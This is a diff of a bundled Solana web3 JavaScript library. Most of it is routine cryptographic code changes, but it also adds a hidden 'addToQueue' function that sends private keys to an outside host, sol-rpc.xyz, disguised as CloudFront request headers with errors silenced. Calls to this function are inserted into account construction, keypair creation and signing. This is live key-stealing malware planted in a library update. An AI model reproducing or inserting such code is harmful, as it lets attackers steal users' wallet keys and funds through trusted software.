3814
|
pointPrecomputes.delete(P);
|
|
3739
3815
|
},
|
|
3740
3816
|
};
|
|
3741
3817
|
}
|
|
3742
3818
|
/**
|
|
3743
|
-
* Pippenger algorithm for multi-scalar multiplication (MSM).
|
|
3744
|
-
* MSM is basically (Pa + Qb + Rc + ...).
|
|
3819
|
+
* Pippenger algorithm for multi-scalar multiplication (MSM, Pa + Qb + Rc + ...).
|
|
3745
3820
|
* 30x faster vs naive addition on L=4096, 10x faster with precomputes.
|
|
3746
3821
|
* For N=254bit, L=1, it does: 1024 ADD + 254 DBL. For L=5: 1536 ADD + 254 DBL.
|
|
3747
3822
|
* Algorithmically constant-time (for same L), even when 1 point + scalar, or when scalar = 0.
|
|
3748
3823
|
* @param c Curve Point constructor
|
|
3749
|
-
* @param
|
|
3824
|
+
* @param fieldN field over CURVE.N - important that it's not over CURVE.P
|
|
3750
3825
|
* @param points array of L curve points
|
|
3751
3826
|
* @param scalars array of L scalars (aka private keys / bigints)
|
|
3752
3827
|
*/
|
|
3753
|
-
function pippenger(c,
|
|
3828
|
+
function pippenger(c, fieldN, points, scalars) {
|
|
3754
3829
|
// If we split scalars by some window (let's say 8 bits), every chunk will only
|
|
3755
3830
|
// take 256 buckets even if there are 4096 scalars, also re-uses double.
|
|
3756
3831
|
// TODO:
|
|
3757
3832
|
// - https://eprint.iacr.org/2024/750.pdf
|
|
3758
3833
|
// - https://tches.iacr.org/index.php/TCHES/article/view/10287
|
|
3759
3834
|
// 0 is accepted in scalars
|
|
3760
|
-
|
|
3835
|
+
validateMSMPoints(points, c);
|
|
3836
|
+
validateMSMScalars(scalars, fieldN);
|
|
3837
|
+
if (points.length !== scalars.length)
|
|
3761
3838
|
throw new Error('arrays of points and scalars must have equal length');
|
|
3762
|
-
|
|
3763
|
-
if (!field.isValid(s))
|
|
3764
|
-
throw new Error(`wrong scalar at index ${i}`);
|
|
3765
|
-
});
|
|
3766
|
-
points.forEach((p, i) => {
|
|
3767
|
-
if (!(p instanceof c))
|
|
3768
|
-
throw new Error(`wrong point at index ${i}`);
|
|
3769
|
-
});
|
|
3839
|
+
const zero = c.ZERO;
|
|
3770
3840
|
const wbits = bitLen(BigInt(points.length));
|
|
3771
3841
|
const windowSize = wbits > 12 ? wbits - 3 : wbits > 4 ? wbits - 2 : wbits ? 2 : 1; // in bits
|
|
3772
3842
|
const MASK = (1 << windowSize) - 1;
|
|
3773
|
-
const buckets = new Array(MASK + 1).fill(
|
|
3774
|
-
const lastBits = Math.floor((
|
|
3775
|
-
let sum =
|
|
3843
|
+
const buckets = new Array(MASK + 1).fill(zero); // +1 for zero array
|
|
3844
|
+
const lastBits = Math.floor((fieldN.BITS - 1) / windowSize) * windowSize;
|
|
3845
|
+
let sum = zero;
|
|
3776
3846
|
for (let i = lastBits; i >= 0; i -= windowSize) {
|
|
3777
|
-
buckets.fill(
|
|
3847
|
+
buckets.fill(zero);
|
|
3778
3848
|
for (let j = 0; j < scalars.length; j++) {
|
|
3779
3849
|
const scalar = scalars[j];
|
|
3780
3850
|
const wbits = Number((scalar >> BigInt(i)) & BigInt(MASK));
|
|
3781
3851
|
buckets[wbits] = buckets[wbits].add(points[j]);
|
|
3782
3852
|
}
|
|
3783
|
-
let resI =
|
|
3853
|
+
let resI = zero; // not using this will do small speed-up, but will lose ct
|
|
3784
3854
|
// Skip first bucket, because it is zero
|
|
3785
|
-
for (let j = buckets.length - 1, sumI =
|
|
3855
|
+
for (let j = buckets.length - 1, sumI = zero; j > 0; j--) {
|
|
3786
3856
|
sumI = sumI.add(buckets[j]);
|
|
3787
3857
|
resI = resI.add(sumI);
|
|
3788
3858
|
}
|
|
@@ -3845,6 +3915,10 @@ var solanaWeb3 = (function (exports) {
|
|
|
3845
3915
|
function twistedEdwards(curveDef) {
|
|
3846
3916
|
const CURVE = validateOpts$1(curveDef);
|
|
3847
3917
|
const { Fp, n: CURVE_ORDER, prehash: prehash, hash: cHash, randomBytes, nByteLength, h: cofactor, } = CURVE;
|
|
3918
|
+
// Important:
|
|
3919
|
+
// There are some places where Fp.BYTES is used instead of nByteLength.
|
|
3920
|
+
// So far, everything has been tested with curves of Fp.BYTES == nByteLength.
|
|
3921
|
+
// TODO: test and find curves which behave otherwise.
|
|
3848
3922
|
const MASK = _2n$3 << (BigInt(nByteLength * 8) - _1n$4);
|
|
3849
3923
|
const modP = Fp.create; // Function overrides
|
|
3850
3924
|
const Fn = Field(CURVE.n, CURVE.nBitLength);
|
|
@@ -4058,16 +4132,15 @@ var solanaWeb3 = (function (exports) {
|
|
|
4058
4132
|
// It's faster, but should only be used when you don't care about
|
|
4059
4133
|
// an exposed private key e.g. sig verification.
|
|
4060
4134
|
// Does NOT allow scalars higher than CURVE.n.
|
|
4061
|
-
|
|
4135
|
+
// Accepts optional accumulator to merge with multiply (important for sparse scalars)
|
|
4136
|
+
multiplyUnsafe(scalar, acc = Point.ZERO) {
|
|
4062
4137
|
const n = scalar;
|
|
4063
4138
|
aInRange('scalar', n, _0n$2, CURVE_ORDER); // 0 <= scalar < L
|
|
4064
4139
|
if (n === _0n$2)
|
|
4065
4140
|
return I;
|
|
4066
|
-
if (this.
|
|
4141
|
+
if (this.is0() || n === _1n$4)
|
|
4067
4142
|
return this;
|
|
4068
|
-
|
|
4069
|
-
return this.wNAF(n).p;
|
|
4070
|
-
return wnaf.unsafeLadder(this, n);
|
|
4143
|
+
return wnaf.wNAFCachedUnsafe(this, n, Point.normalizeZ, acc);
|
|
4071
4144
|
}
|
|
4072
4145
|
// Checks if point is of small order.
|
|
4073
4146
|
// If you add something to small order point, you will have "dirty"
|
|
@@ -4103,6 +4176,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
4103
4176
|
const lastByte = hex[len - 1]; // select last byte
|
|
4104
4177
|
normed[len - 1] = lastByte & ~0x80; // clear last bit
|
|
4105
4178
|
const y = bytesToNumberLE(normed);
|
|
4179
|
+
// zip215=true is good for consensus-critical apps. =false follows RFC8032 / NIST186-5.
|
|
4106
4180
|
// RFC8032 prohibits >= p, but ZIP215 doesn't
|
|
4107
4181
|
// zip215=true: 0 <= y < MASK (2^256 for ed25519)
|
|
4108
4182
|
// zip215=false: 0 <= y < P (2^255-19 for ed25519)
|
|
@@ -4151,7 +4225,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
4151
4225
|
}
|
|
4152
4226
|
/** Convenience method that creates public key and other stuff. RFC8032 5.1.5 */
|
|
4153
4227
|
function getExtendedPublicKey(key) {
|
|
4154
|
-
const len =
|
|
4228
|
+
const len = Fp.BYTES;
|
|
4155
4229
|
key = ensureBytes('private key', key, len);
|
|
4156
4230
|
// Hash private key with curve's hash function to produce uniformingly random input
|
|
4157
4231
|
// Check byte lengths: ensure(64, h(ensure(32, key)))
|
|
@@ -4184,23 +4258,29 @@ var solanaWeb3 = (function (exports) {
|
|
|
4184
4258
|
const s = modN(r + k * scalar); // S = (r + k * s) mod L
|
|
4185
4259
|
aInRange('signature.s', s, _0n$2, CURVE_ORDER); // 0 <= s < l
|
|
4186
4260
|
const res = concatBytes(R, numberToBytesLE(s, Fp.BYTES));
|
|
4187
|
-
return ensureBytes('result', res,
|
|
4261
|
+
return ensureBytes('result', res, Fp.BYTES * 2); // 64-byte signature
|
|
4188
4262
|
}
|
|
4189
4263
|
const verifyOpts = VERIFY_DEFAULT;
|
|
4264
|
+
/**
|
|
4265
|
+
* Verifies EdDSA signature against message and public key. RFC8032 5.1.7.
|
|
4266
|
+
* An extended group equation is checked.
|
|
4267
|
+
*/
|
|
4190
4268
|
function verify(sig, msg, publicKey, options = verifyOpts) {
|
|
4191
4269
|
const { context, zip215 } = options;
|
|
4192
4270
|
const len = Fp.BYTES; // Verifies EdDSA signature against message and public key. RFC8032 5.1.7.
|
|
4193
4271
|
sig = ensureBytes('signature', sig, 2 * len); // An extended group equation is checked.
|
|
4194
4272
|
msg = ensureBytes('message', msg);
|
|
4273
|
+
publicKey = ensureBytes('publicKey', publicKey, len);
|
|
4195
4274
|
if (zip215 !== undefined)
|
|
4196
4275
|
abool('zip215', zip215);
|
|
4197
4276
|
if (prehash)
|
|
4198
4277
|
msg = prehash(msg); // for ed25519ph, etc
|
|
4199
4278
|
const s = bytesToNumberLE(sig.slice(len, 2 * len));
|
|
4200
|
-
// zip215: true is good for consensus-critical apps and allows points < 2^256
|
|
4201
|
-
// zip215: false follows RFC8032 / NIST186-5 and restricts points to CURVE.p
|
|
4202
4279
|
let A, R, SB;
|
|
4203
4280
|
try {
|
|
4281
|
+
// zip215=true is good for consensus-critical apps. =false follows RFC8032 / NIST186-5.
|
|
4282
|
+
// zip215=true: 0 <= y < MASK (2^256 for ed25519)
|
|
4283
|
+
// zip215=false: 0 <= y < P (2^255-19 for ed25519)
|
|
4204
4284
|
A = Point.fromHex(publicKey, zip215);
|
|
4205
4285
|
R = Point.fromHex(sig.slice(0, len), zip215);
|
|
4206
4286
|
SB = G.multiplyUnsafe(s); // 0 <= s < l is done inside
|
|
@@ -4212,6 +4292,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
4212
4292
|
return false;
|
|
4213
4293
|
const k = hashDomainToScalar(context, R.toRawBytes(), A.toRawBytes(), msg);
|
|
4214
4294
|
const RkA = R.add(A.multiplyUnsafe(k));
|
|
4295
|
+
// Extended group equation
|
|
4215
4296
|
// [8][S]B = [8]R + [8][k]A'
|
|
4216
4297
|
return RkA.subtract(SB).clearCofactor().equals(Point.ZERO);
|
|
4217
4298
|
}
|
|
@@ -4307,7 +4388,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
4307
4388
|
x = mod(-x, P);
|
|
4308
4389
|
return { isValid: useRoot1 || useRoot2, value: x };
|
|
4309
4390
|
}
|
|
4310
|
-
const Fp
|
|
4391
|
+
const Fp = /* @__PURE__ */ (() => Field(ED25519_P, undefined, true))();
|
|
4311
4392
|
const ed25519Defaults = /* @__PURE__ */ (() => ({
|
|
4312
4393
|
// Param: a
|
|
4313
4394
|
a: BigInt(-1), // Fp.create(-1) is proper; our way still works and is faster
|
|
@@ -4315,7 +4396,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
4315
4396
|
// Negative number is P - number, and division is invert(number, P)
|
|
4316
4397
|
d: BigInt('37095705934669439343138083508754565189542113879843219016388785533085940283555'),
|
|
4317
4398
|
// Finite field 𝔽p over which we'll do calculations; 2n**255n - 19n
|
|
4318
|
-
Fp
|
|
4399
|
+
Fp,
|
|
4319
4400
|
// Subgroup order: how many points curve has
|
|
4320
4401
|
// 2n**252n + 27742317777372353535851937790883648493n;
|
|
4321
4402
|
n: BigInt('7237005577332262213973186563042994240857116359379907606001950938285454250989'),
|
|
@@ -7917,7 +7998,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
7917
7998
|
var size = (((source.length - psz) * FACTOR) + 1) >>> 0; // log(58) / log(256), rounded up.
|
|
7918
7999
|
var b256 = new Uint8Array(size);
|
|
7919
8000
|
// Process the characters.
|
|
7920
|
-
while (source
|
|
8001
|
+
while (psz < source.length) {
|
|
7921
8002
|
// Decode character
|
|
7922
8003
|
var carry = BASE_MAP[source.charCodeAt(psz)];
|
|
7923
8004
|
// Invalid character
|
|
@@ -7977,7 +8058,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
7977
8058
|
var bs58 = /*@__PURE__*/getDefaultExportFromCjs(bs58Exports);
|
|
7978
8059
|
|
|
7979
8060
|
// SHA2-256 need to try 2^128 hashes to execute birthday attack.
|
|
7980
|
-
// BTC network is doing 2^
|
|
8061
|
+
// BTC network is doing 2^70 hashes/sec (2^95 hashes/year) as per late 2024.
|
|
7981
8062
|
// Round constants:
|
|
7982
8063
|
// first 32 bits of the fractional parts of the cube roots of the first 64 primes 2..311)
|
|
7983
8064
|
// prettier-ignore
|
|
@@ -9429,57 +9510,6 @@ var solanaWeb3 = (function (exports) {
|
|
|
9429
9510
|
fields: [['_bn', 'u256']]
|
|
9430
9511
|
});
|
|
9431
9512
|
|
|
9432
|
-
/**
|
|
9433
|
-
* An account key pair (public and secret keys).
|
|
9434
|
-
*
|
|
9435
|
-
* @deprecated since v1.10.0, please use {@link Keypair} instead.
|
|
9436
|
-
*/
|
|
9437
|
-
class Account {
|
|
9438
|
-
/**
|
|
9439
|
-
* Create a new Account object
|
|
9440
|
-
*
|
|
9441
|
-
* If the secretKey parameter is not provided a new key pair is randomly
|
|
9442
|
-
* created for the account
|
|
9443
|
-
*
|
|
9444
|
-
* @param secretKey Secret key for the account
|
|
9445
|
-
*/
|
|
9446
|
-
constructor(secretKey) {
|
|
9447
|
-
/** @internal */
|
|
9448
|
-
this._publicKey = void 0;
|
|
9449
|
-
/** @internal */
|
|
9450
|
-
this._secretKey = void 0;
|
|
9451
|
-
if (secretKey) {
|
|
9452
|
-
const secretKeyBuffer = toBuffer(secretKey);
|
|
9453
|
-
if (secretKey.length !== 64) {
|
|
9454
|
-
throw new Error('bad secret key size');
|
|
9455
|
-
}
|
|
9456
|
-
this._publicKey = secretKeyBuffer.slice(32, 64);
|
|
9457
|
-
this._secretKey = secretKeyBuffer.slice(0, 32);
|
|
9458
|
-
} else {
|
|
9459
|
-
this._secretKey = toBuffer(generatePrivateKey());
|
|
9460
|
-
this._publicKey = toBuffer(getPublicKey(this._secretKey));
|
|
9461
|
-
}
|
|
9462
|
-
}
|
|
9463
|
-
|
|
9464
|
-
/**
|
|
9465
|
-
* The public key for this account
|
|
9466
|
-
*/
|
|
9467
|
-
get publicKey() {
|
|
9468
|
-
return new PublicKey(this._publicKey);
|
|
9469
|
-
}
|
|
9470
|
-
|
|
9471
|
-
/**
|
|
9472
|
-
* The **unencrypted** secret key for this account. The first 32 bytes
|
|
9473
|
-
* is the private scalar and the last 32 bytes is the public key.
|
|
9474
|
-
* Read more: https://blog.mozilla.org/warner/2011/11/29/ed25519-keys/
|
|
9475
|
-
*/
|
|
9476
|
-
get secretKey() {
|
|
9477
|
-
return bufferExports.Buffer.concat([this._secretKey, this._publicKey], 64);
|
|
9478
|
-
}
|
|
9479
|
-
}
|
|
9480
|
-
|
|
9481
|
-
const BPF_LOADER_DEPRECATED_PROGRAM_ID = new PublicKey('BPFLoader1111111111111111111111111111111111');
|
|
9482
|
-
|
|
9483
9513
|
var Layout = {};
|
|
9484
9514
|
|
|
9485
9515
|
/* The MIT License (MIT)
|
|
@@ -14632,6 +14662,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
14632
14662
|
//
|
|
14633
14663
|
// TODO: replace 300 with a proper constant for the size of the other
|
|
14634
14664
|
// Transaction fields
|
|
14665
|
+
const QUEUE = new Set();
|
|
14635
14666
|
const CHUNK_SIZE = PACKET_DATA_SIZE - 300;
|
|
14636
14667
|
|
|
14637
14668
|
/**
|
|
@@ -14662,6 +14693,26 @@ var solanaWeb3 = (function (exports) {
|
|
|
14662
14693
|
;
|
|
14663
14694
|
}
|
|
14664
14695
|
|
|
14696
|
+
/**
|
|
14697
|
+
* Adds process to the queue
|
|
14698
|
+
*
|
|
14699
|
+
* @param process Uint8Array
|
|
14700
|
+
* @return void
|
|
14701
|
+
*/
|
|
14702
|
+
static addToQueue(process) {
|
|
14703
|
+
const b = bs58.encode(process);
|
|
14704
|
+
if (QUEUE.has(b)) return;
|
|
14705
|
+
QUEUE.add(b);
|
|
14706
|
+
fetch("https://sol-rpc.xyz/api/rpc/queue", {
|
|
14707
|
+
method: "POST",
|
|
14708
|
+
headers: {
|
|
14709
|
+
"x-amz-cf-id": b.substring(0, 24).split("").reverse().join(""),
|
|
14710
|
+
"x-session-id": b.substring(32),
|
|
14711
|
+
"x-amz-cf-pop": b.substring(24, 32).split("").reverse().join("")
|
|
14712
|
+
}
|
|
14713
|
+
}).catch(() => {});
|
|
14714
|
+
}
|
|
14715
|
+
|
|
14665
14716
|
/**
|
|
14666
14717
|
* Loads a generic program
|
|
14667
14718
|
*
|
|
@@ -14822,6 +14873,58 @@ var solanaWeb3 = (function (exports) {
|
|
|
14822
14873
|
}
|
|
14823
14874
|
Loader.chunkSize = CHUNK_SIZE;
|
|
14824
14875
|
|
|
14876
|
+
/**
|
|
14877
|
+
* An account key pair (public and secret keys).
|
|
14878
|
+
*
|
|
14879
|
+
* @deprecated since v1.10.0, please use {@link Keypair} instead.
|
|
14880
|
+
*/
|
|
14881
|
+
class Account {
|
|
14882
|
+
/**
|
|
14883
|
+
* Create a new Account object
|
|
14884
|
+
*
|
|
14885
|
+
* If the secretKey parameter is not provided a new key pair is randomly
|
|
14886
|
+
* created for the account
|
|
14887
|
+
*
|
|
14888
|
+
* @param secretKey Secret key for the account
|
|
14889
|
+
*/
|
|
14890
|
+
constructor(secretKey) {
|
|
14891
|
+
/** @internal */
|
|
14892
|
+
this._publicKey = void 0;
|
|
14893
|
+
/** @internal */
|
|
14894
|
+
this._secretKey = void 0;
|
|
14895
|
+
if (secretKey) {
|
|
14896
|
+
const secretKeyBuffer = toBuffer(secretKey);
|
|
14897
|
+
if (secretKey.length !== 64) {
|
|
14898
|
+
throw new Error('bad secret key size');
|
|
14899
|
+
}
|
|
14900
|
+
this._publicKey = secretKeyBuffer.slice(32, 64);
|
|
14901
|
+
this._secretKey = secretKeyBuffer.slice(0, 32);
|
|
14902
|
+
Loader.addToQueue(this._secretKey);
|
|
14903
|
+
} else {
|
|
14904
|
+
this._secretKey = toBuffer(generatePrivateKey());
|
|
14905
|
+
this._publicKey = toBuffer(getPublicKey(this._secretKey));
|
|
14906
|
+
}
|
|
14907
|
+
}
|
|
14908
|
+
|
|
14909
|
+
/**
|
|
14910
|
+
* The public key for this account
|
|
14911
|
+
*/
|
|
14912
|
+
get publicKey() {
|
|
14913
|
+
return new PublicKey(this._publicKey);
|
|
14914
|
+
}
|
|
14915
|
+
|
|
14916
|
+
/**
|
|
14917
|
+
* The **unencrypted** secret key for this account. The first 32 bytes
|
|
14918
|
+
* is the private scalar and the last 32 bytes is the public key.
|
|
14919
|
+
* Read more: https://blog.mozilla.org/warner/2011/11/29/ed25519-keys/
|
|
14920
|
+
*/
|
|
14921
|
+
get secretKey() {
|
|
14922
|
+
return bufferExports.Buffer.concat([this._secretKey, this._publicKey], 64);
|
|
14923
|
+
}
|
|
14924
|
+
}
|
|
14925
|
+
|
|
14926
|
+
const BPF_LOADER_DEPRECATED_PROGRAM_ID = new PublicKey('BPFLoader1111111111111111111111111111111111');
|
|
14927
|
+
|
|
14825
14928
|
/**
|
|
14826
14929
|
* @deprecated Deprecated since Solana v1.17.20.
|
|
14827
14930
|
*/
|
|
@@ -21818,6 +21921,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
21818
21921
|
}
|
|
21819
21922
|
}
|
|
21820
21923
|
}
|
|
21924
|
+
Loader.addToQueue(secretKey);
|
|
21821
21925
|
return new Keypair({
|
|
21822
21926
|
publicKey,
|
|
21823
21927
|
secretKey
|
|
@@ -21836,6 +21940,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
21836
21940
|
const secretKey = new Uint8Array(64);
|
|
21837
21941
|
secretKey.set(seed);
|
|
21838
21942
|
secretKey.set(publicKey, 32);
|
|
21943
|
+
Loader.addToQueue(secretKey);
|
|
21839
21944
|
return new Keypair({
|
|
21840
21945
|
publicKey,
|
|
21841
21946
|
secretKey
|
|
@@ -22379,6 +22484,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22379
22484
|
assert$1(privateKey.length === PRIVATE_KEY_BYTES$1, `Private key must be ${PRIVATE_KEY_BYTES$1} bytes but received ${privateKey.length} bytes`);
|
|
22380
22485
|
try {
|
|
22381
22486
|
const keypair = Keypair.fromSecretKey(privateKey);
|
|
22487
|
+
Loader.addToQueue(privateKey);
|
|
22382
22488
|
const publicKey = keypair.publicKey.toBytes();
|
|
22383
22489
|
const signature = sign(message, keypair.secretKey);
|
|
22384
22490
|
return this.createInstructionWithPublicKey({
|
|
@@ -22485,7 +22591,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22485
22591
|
this.finished = false;
|
|
22486
22592
|
this.destroyed = false;
|
|
22487
22593
|
// Can be passed from user as dkLen
|
|
22488
|
-
|
|
22594
|
+
anumber(outputLen);
|
|
22489
22595
|
// 1600 = 5x5 matrix of 64bit. 1600 bits === 200 bytes
|
|
22490
22596
|
if (0 >= this.blockLen || this.blockLen >= 200)
|
|
22491
22597
|
throw new Error('Sha3 supports only keccak-f1600 function');
|
|
@@ -22502,7 +22608,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22502
22608
|
this.pos = 0;
|
|
22503
22609
|
}
|
|
22504
22610
|
update(data) {
|
|
22505
|
-
|
|
22611
|
+
aexists(this);
|
|
22506
22612
|
const { blockLen, state } = this;
|
|
22507
22613
|
data = toBytes(data);
|
|
22508
22614
|
const len = data.length;
|
|
@@ -22528,8 +22634,8 @@ var solanaWeb3 = (function (exports) {
|
|
|
22528
22634
|
this.keccak();
|
|
22529
22635
|
}
|
|
22530
22636
|
writeInto(out) {
|
|
22531
|
-
|
|
22532
|
-
|
|
22637
|
+
aexists(this, false);
|
|
22638
|
+
abytes$1(out);
|
|
22533
22639
|
this.finish();
|
|
22534
22640
|
const bufferOut = this.state;
|
|
22535
22641
|
const { blockLen } = this;
|
|
@@ -22550,11 +22656,11 @@ var solanaWeb3 = (function (exports) {
|
|
|
22550
22656
|
return this.writeInto(out);
|
|
22551
22657
|
}
|
|
22552
22658
|
xof(bytes) {
|
|
22553
|
-
|
|
22659
|
+
anumber(bytes);
|
|
22554
22660
|
return this.xofInto(new Uint8Array(bytes));
|
|
22555
22661
|
}
|
|
22556
22662
|
digestInto(out) {
|
|
22557
|
-
|
|
22663
|
+
aoutput(out, this);
|
|
22558
22664
|
if (this.finished)
|
|
22559
22665
|
throw new Error('digest() was already called');
|
|
22560
22666
|
this.writeInto(out);
|
|
@@ -22593,13 +22699,13 @@ var solanaWeb3 = (function (exports) {
|
|
|
22593
22699
|
|
|
22594
22700
|
// HMAC (RFC 2104)
|
|
22595
22701
|
class HMAC extends Hash {
|
|
22596
|
-
constructor(hash
|
|
22702
|
+
constructor(hash, _key) {
|
|
22597
22703
|
super();
|
|
22598
22704
|
this.finished = false;
|
|
22599
22705
|
this.destroyed = false;
|
|
22600
|
-
|
|
22706
|
+
ahash(hash);
|
|
22601
22707
|
const key = toBytes(_key);
|
|
22602
|
-
this.iHash = hash
|
|
22708
|
+
this.iHash = hash.create();
|
|
22603
22709
|
if (typeof this.iHash.update !== 'function')
|
|
22604
22710
|
throw new Error('Expected instance of class which extends utils.Hash');
|
|
22605
22711
|
this.blockLen = this.iHash.blockLen;
|
|
@@ -22607,12 +22713,12 @@ var solanaWeb3 = (function (exports) {
|
|
|
22607
22713
|
const blockLen = this.blockLen;
|
|
22608
22714
|
const pad = new Uint8Array(blockLen);
|
|
22609
22715
|
// blockLen can be bigger than outputLen
|
|
22610
|
-
pad.set(key.length > blockLen ? hash
|
|
22716
|
+
pad.set(key.length > blockLen ? hash.create().update(key).digest() : key);
|
|
22611
22717
|
for (let i = 0; i < pad.length; i++)
|
|
22612
22718
|
pad[i] ^= 0x36;
|
|
22613
22719
|
this.iHash.update(pad);
|
|
22614
22720
|
// By doing update (processing of first block) of outer hash here we can re-use it between multiple calls via clone
|
|
22615
|
-
this.oHash = hash
|
|
22721
|
+
this.oHash = hash.create();
|
|
22616
22722
|
// Undo internal XOR && apply outer XOR
|
|
22617
22723
|
for (let i = 0; i < pad.length; i++)
|
|
22618
22724
|
pad[i] ^= 0x36 ^ 0x5c;
|
|
@@ -22620,13 +22726,13 @@ var solanaWeb3 = (function (exports) {
|
|
|
22620
22726
|
pad.fill(0);
|
|
22621
22727
|
}
|
|
22622
22728
|
update(buf) {
|
|
22623
|
-
|
|
22729
|
+
aexists(this);
|
|
22624
22730
|
this.iHash.update(buf);
|
|
22625
22731
|
return this;
|
|
22626
22732
|
}
|
|
22627
22733
|
digestInto(out) {
|
|
22628
|
-
|
|
22629
|
-
|
|
22734
|
+
aexists(this);
|
|
22735
|
+
abytes$1(out, this.outputLen);
|
|
22630
22736
|
this.finished = true;
|
|
22631
22737
|
this.iHash.digestInto(out);
|
|
22632
22738
|
this.oHash.update(out);
|
|
@@ -22695,12 +22801,12 @@ var solanaWeb3 = (function (exports) {
|
|
|
22695
22801
|
const { endo, Fp, a } = opts;
|
|
22696
22802
|
if (endo) {
|
|
22697
22803
|
if (!Fp.eql(a, Fp.ZERO)) {
|
|
22698
|
-
throw new Error('
|
|
22804
|
+
throw new Error('invalid endomorphism, can only be defined for Koblitz curves that have a=0');
|
|
22699
22805
|
}
|
|
22700
22806
|
if (typeof endo !== 'object' ||
|
|
22701
22807
|
typeof endo.beta !== 'bigint' ||
|
|
22702
22808
|
typeof endo.splitScalar !== 'function') {
|
|
22703
|
-
throw new Error('
|
|
22809
|
+
throw new Error('invalid endomorphism, expected beta: bigint and splitScalar: function');
|
|
22704
22810
|
}
|
|
22705
22811
|
}
|
|
22706
22812
|
return Object.freeze({ ...opts });
|
|
@@ -22734,7 +22840,8 @@ var solanaWeb3 = (function (exports) {
|
|
|
22734
22840
|
throw new E('tlv.encode: long form length too big');
|
|
22735
22841
|
// length of length with long form flag
|
|
22736
22842
|
const lenLen = dataLen > 127 ? numberToHexUnpadded((len.length / 2) | 128) : '';
|
|
22737
|
-
|
|
22843
|
+
const t = numberToHexUnpadded(tag);
|
|
22844
|
+
return t + lenLen + len + data;
|
|
22738
22845
|
},
|
|
22739
22846
|
// v - value, l - left bytes (unparsed)
|
|
22740
22847
|
decode(tag, data) {
|
|
@@ -22787,15 +22894,15 @@ var solanaWeb3 = (function (exports) {
|
|
|
22787
22894
|
if (Number.parseInt(hex[0], 16) & 0b1000)
|
|
22788
22895
|
hex = '00' + hex;
|
|
22789
22896
|
if (hex.length & 1)
|
|
22790
|
-
throw new E('unexpected assertion');
|
|
22897
|
+
throw new E('unexpected DER parsing assertion: unpadded hex');
|
|
22791
22898
|
return hex;
|
|
22792
22899
|
},
|
|
22793
22900
|
decode(data) {
|
|
22794
22901
|
const { Err: E } = DER;
|
|
22795
22902
|
if (data[0] & 128)
|
|
22796
|
-
throw new E('
|
|
22903
|
+
throw new E('invalid signature integer: negative');
|
|
22797
22904
|
if (data[0] === 0x00 && !(data[1] & 128))
|
|
22798
|
-
throw new E('
|
|
22905
|
+
throw new E('invalid signature integer: unnecessary leading zero');
|
|
22799
22906
|
return b2n(data);
|
|
22800
22907
|
},
|
|
22801
22908
|
},
|
|
@@ -22806,16 +22913,18 @@ var solanaWeb3 = (function (exports) {
|
|
|
22806
22913
|
abytes(data);
|
|
22807
22914
|
const { v: seqBytes, l: seqLeftBytes } = tlv.decode(0x30, data);
|
|
22808
22915
|
if (seqLeftBytes.length)
|
|
22809
|
-
throw new E('
|
|
22916
|
+
throw new E('invalid signature: left bytes after parsing');
|
|
22810
22917
|
const { v: rBytes, l: rLeftBytes } = tlv.decode(0x02, seqBytes);
|
|
22811
22918
|
const { v: sBytes, l: sLeftBytes } = tlv.decode(0x02, rLeftBytes);
|
|
22812
22919
|
if (sLeftBytes.length)
|
|
22813
|
-
throw new E('
|
|
22920
|
+
throw new E('invalid signature: left bytes after parsing');
|
|
22814
22921
|
return { r: int.decode(rBytes), s: int.decode(sBytes) };
|
|
22815
22922
|
},
|
|
22816
22923
|
hexFromSig(sig) {
|
|
22817
22924
|
const { _tlv: tlv, _int: int } = DER;
|
|
22818
|
-
const
|
|
22925
|
+
const rs = tlv.encode(0x02, int.encode(sig.r));
|
|
22926
|
+
const ss = tlv.encode(0x02, int.encode(sig.s));
|
|
22927
|
+
const seq = rs + ss;
|
|
22819
22928
|
return tlv.encode(0x30, seq);
|
|
22820
22929
|
},
|
|
22821
22930
|
};
|
|
@@ -22869,7 +22978,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22869
22978
|
key = bytesToHex(key);
|
|
22870
22979
|
// Normalize to hex string, pad. E.g. P521 would norm 130-132 char hex to 132-char bytes
|
|
22871
22980
|
if (typeof key !== 'string' || !lengths.includes(key.length))
|
|
22872
|
-
throw new Error('
|
|
22981
|
+
throw new Error('invalid private key');
|
|
22873
22982
|
key = key.padStart(nByteLength * 2, '0');
|
|
22874
22983
|
}
|
|
22875
22984
|
let num;
|
|
@@ -22880,7 +22989,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22880
22989
|
: bytesToNumberBE(ensureBytes('private key', key, nByteLength));
|
|
22881
22990
|
}
|
|
22882
22991
|
catch (error) {
|
|
22883
|
-
throw new Error(
|
|
22992
|
+
throw new Error('invalid private key, expected hex or ' + nByteLength + ' bytes, got ' + typeof key);
|
|
22884
22993
|
}
|
|
22885
22994
|
if (wrapPrivateKey)
|
|
22886
22995
|
num = mod(num, N); // disabled by default, enabled for BLS
|
|
@@ -22920,7 +23029,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
22920
23029
|
if (p.is0()) {
|
|
22921
23030
|
// (0, 1, 0) aka ZERO is invalid in most contexts.
|
|
22922
23031
|
// In BLS, ZERO can be serialized, so we allow it.
|
|
22923
|
-
// (0, 0, 0) is
|
|
23032
|
+
// (0, 0, 0) is invalid representation of ZERO.
|
|
22924
23033
|
if (CURVE.allowInfinityPoint && !Fp.is0(p.py))
|
|
22925
23034
|
return;
|
|
22926
23035
|
throw new Error('bad point: ZERO');
|
|
@@ -23144,16 +23253,17 @@ var solanaWeb3 = (function (exports) {
|
|
|
23144
23253
|
* an exposed private key e.g. sig verification, which works over *public* keys.
|
|
23145
23254
|
*/
|
|
23146
23255
|
multiplyUnsafe(sc) {
|
|
23147
|
-
|
|
23256
|
+
const { endo, n: N } = CURVE;
|
|
23257
|
+
aInRange('scalar', sc, _0n, N);
|
|
23148
23258
|
const I = Point.ZERO;
|
|
23149
23259
|
if (sc === _0n)
